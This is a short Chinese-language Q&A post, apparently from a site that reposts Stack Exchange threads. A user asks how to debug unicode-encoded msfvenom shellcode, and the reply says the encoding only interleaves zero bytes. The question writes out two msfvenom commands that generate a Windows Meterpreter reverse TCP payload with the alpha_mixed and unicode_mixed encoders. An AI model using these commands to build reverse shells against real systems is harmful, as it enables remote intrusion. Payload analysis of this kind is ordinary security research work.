如何解决调试Unicode msfvenom有效负载
我想调试一些msfvenom
生成的有效负载。
当我以这种方式使用“标准”编码生成有效负载时,我完全能够做到这一点:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX
在这种情况下,我可以得到结果的有效载荷,使用类似Blobrunner的东西,然后就可以开始使用了。
如果我生成具有unicode编码的shellcode
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX
这是行不通的:处理shellcode时,我得到了很多重复/无效的指令。这是有道理的,因为我想我将其作为常规编码进行管理。但是,我该如何调试此shellcode?有什么工具可以将其转换为“有效”序列,从而删除“ unicode填充”?
非常感谢!
解决方法
我想我明白了:这只是在字节之间添加一个带00的交错的问题...容易...不知道为什么我以前错过了它...
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。